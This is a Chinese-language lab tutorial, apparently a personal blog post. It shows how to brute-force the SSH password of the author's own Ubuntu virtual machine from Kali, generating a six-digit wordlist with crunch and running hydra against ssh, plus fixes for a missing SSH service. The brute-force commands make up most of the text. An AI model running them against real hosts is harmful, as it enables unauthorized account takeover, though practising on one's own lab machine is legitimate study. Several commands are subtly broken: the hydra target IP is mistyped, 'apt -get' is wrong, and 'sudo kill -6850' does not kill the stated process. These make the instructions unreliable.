系统:kali ; linux的Ubuntu版本
本实验是使用kali自带的hydra破解Ubuntu的密码
1.查询ubuntu的ip,使用语句(登录名从图中可以看出是polaris,后面会用到)
ifconfig -a
知道Ubuntu的ip为:192.168.204.134
2.查询kali的ip,使用语句
ifconfig
知道kali的ip为192.168.204.128
3.kali ping Ubuntu ; Ubuntu ping kali 看是否互通(都是使用Ctrl C 快捷键停止)
*如果没互相ping 通,则需要检查Ubuntu和kali的防火墙是否关闭
4.以管理员身份登录kali和Ubuntu,使用语句:
sudo su
5.在kali中创建密码字典,使用语句:(这里因为我的密码是6位数字,所以创建的是6位数字的字典,字典名字为pass.txt)
crunch 6 6 0123456789 >>pass.txt
6.然后开始使用hydra暴力破解,(前面知道,我的Ubuntu登录名为polaris,ip地址为192.168.204.134,kali中创建的字典名为pass.txt,,可以根据情况做出相应替换)使用语句:
hydra -l polaris -P pass.txt ssh://192.68.204.134 -vV
成功破解出密码:000002
实验可能出现的情况:
7.使用语句破解时可能出现像下图中显示的,Connection refusedd,拒绝连接的情况
看图发现ip地址后面有个22,说明无法连接到22端口,这是因为安装Ubuntu的时候,没有开通ssh服务,要解决该问题需要在Ubuntu中下载ssh服务
使用下载语句:
sudo apt -get install openssh-server
下载完成后开启服务:
sudo service ssh start
然后 回到上面的步骤6开始破解;
8.在Ubuntu中下载ssh服务时可能出现 下图中情况,这是因为有进程占用了,需要使用命令杀死占用进程 process 6850
使用语句:
sudo kill -6850
杀死占用进程之后
返回步骤7开始下载,下载完成后返回步骤6开始破解
注:
1.使用语句查看Ubuntu防火墙是否关闭:
inactive代表关闭
sudo ufw status
2.检验ssh服务是否安装成功
sudo ps -e |grep ssh